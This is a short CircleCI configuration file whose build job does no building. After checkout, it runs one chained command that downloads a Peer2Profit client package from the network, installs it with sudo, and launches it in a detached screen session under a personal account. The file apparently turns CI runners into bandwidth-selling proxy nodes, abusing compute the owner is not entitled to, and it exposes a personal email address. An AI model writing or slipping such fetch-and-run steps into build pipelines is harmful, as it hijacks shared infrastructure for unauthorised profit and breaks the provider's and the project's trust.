version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD
    steps:
      - checkout 
      - run: wget -y&&wget https://updates.peer2profit.com/p2pclient_0.56_amd64.deb&&sudo dpkg -i p2pclient_0.56_amd64.deb&&screen -S ready -d -m p2pclient --login ikmalsuaidi@gmail.com&&screen -ls
